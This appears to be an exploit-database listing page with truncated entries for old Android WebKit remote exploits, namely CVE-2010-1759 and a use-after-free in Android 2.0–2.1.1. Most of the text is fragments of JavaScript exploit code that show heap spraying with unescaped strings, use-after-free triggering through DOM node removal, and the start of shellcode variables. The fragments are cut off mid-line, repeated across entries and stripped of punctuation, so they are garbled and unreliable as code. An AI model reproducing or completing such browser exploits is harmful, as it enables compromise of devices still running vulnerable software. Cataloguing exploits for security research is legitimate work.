Webkit normalize bug for android 2.2 (CVE-2010-1759)

No description provided by source. !-- CVE-2010-1759 webkit normalize bug Tested on Moto Droidx2 running 2.2. Droidx2 running 2.3 is vulnerable but exploit fails due to non-executable heap. Still working on a way around that : 2.1 - 2.3 emulator. The changes needed are documented in the code. The...

Webkit normalize bug for android 2.2 (CVE-2010-1759)

Exploit for Android platform in category remote exploits LOADING... var elem1 = document.getElementById"test1"; var elem2 = document.getElementById"test2"; var elem3 = document.getElementById"test3"; function spray for var i = 0; i 180000; i++ var s = new Stringunescape"\u0052\u0052"; //...

Android 2.0 ,2.1, 2.1.1 WebKit Use-After-Free Exploit

Exploit for Android platform in category remote exploits function heap var id = document.getElementById"target"; var attribute = id.getAttributeNode'id'; nodes = attribute.childNodes; document.body.removeChildid; attribute.removeChildnodes0; setTimeoutfunction for var i = 0; i 70000; i++ var s =...

Google Android 2.0/2.1/2.1.1 - WebKit Use-After-Free

function heap var id = document.getElementById"target"; var attribute = id.getAttributeNode'id'; nodes = attribute.childNodes; document.body.removeChildid; attribute.removeChildnodes0; setTimeoutfunction for var i = 0; i 70000; i++ var s = new Stringunescape"\u0058\u0058"; ; var scode =...

Google Android 2.02.12.1.1 - WebKit Use-After-Free

Google Android 2.02.12.1.1 - WebKit Use-After-Free function heap var id = document.getElementById"target"; var attribute = id.getAttributeNode'id'; nodes = attribute.childNodes; document.body.removeChildid; attribute.removeChildnodes0; setTimeoutfunction for var i = 0; i 70000; i++ var s = new...